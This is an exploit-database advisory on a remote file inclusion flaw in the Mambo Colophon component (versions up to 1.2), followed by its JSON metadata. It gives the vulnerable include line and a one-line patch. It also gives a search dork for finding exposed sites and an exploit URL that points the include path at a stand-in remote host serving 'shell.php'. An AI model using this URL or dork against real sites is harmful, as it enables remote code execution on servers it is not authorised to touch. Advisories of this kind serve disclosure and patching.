Mambo Colophon Component <= 1.2 - Remote Inclusion Vulnerability
2014-07-01T00:00:00
ID SSV:63757 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
########### Command Mambo Colophon =<1.2 ##by #Drago84#########
Found By Drago84
Exclusive Security Italian Security
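This bug allows a remote attacker to execute commands via remote file inclusion (RFI). The include path shown below is built from $mosConfig_absolute_path, which is presumably not initialised when the script is requested directly; on PHP configurations that populate globals from request parameters (register_globals) and permit URL includes, the value is then attacker-controlled.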
page:
admin.colophon.php
bug:
require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php");
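patch:
add in admin.colophon.php, before the require_once line shown above, so that the script exits when it is requested directly rather than loaded through Mambo's own entry point (which defines _VALID_MOS):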
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );
dork: inurl:com_colophon
expl:
htttp:/www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?
# milw0rm.com [2006-07-29]
{"type": "seebug", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "_object_type": "robots.models.seebug.SeebugBulletin", "viewCount": 2, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2017-11-19T13:32:47"}, "dependencies": {"references": [], "modified": "2017-11-19T13:32:47"}, "vulnersScore": -0.1}, "reporter": "Root", "title": "Mambo Colophon Component <= 1.2 - Remote Inclusion Vulnerability", "objectVersion": "1.4", "cvelist": [], "bulletinFamily": "exploit", "sourceHref": "https://www.seebug.org/vuldb/ssvid-63757", "cvss": {"score": 0.0, "vector": "NONE"}, "references": [], "enchantments_done": [], "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "href": "https://www.seebug.org/vuldb/ssvid-63757", "history": [], "id": "SSV:63757", "status": "cve,poc", "lastseen": "2017-11-19T13:32:47", "sourceData": "\n ########### Command Mambo Colophon =<1.2 ##by #Drago84#########\r\n\r\n Found By Drago84\r\nExclusive Security Italian Security\r\n\r\n This bug allows a remote atacker to execute commands via rfi\r\n\r\npage:\r\n admin.colophon.php\r\n\r\nbug:\r\n require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php");\r\n\r\npath:\r\nadd in admin.colophon.php\r\ndefined( '_VALID_MOS' ) or die( 'hacking attemp.' );\r\n\r\ndork: inurl:com_colophon\r\n\r\nexpl:\r\nhtttp:/www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?\r\n\r\n# milw0rm.com [2006-07-29]\r\n\n ", "published": "2014-07-01T00:00:00"}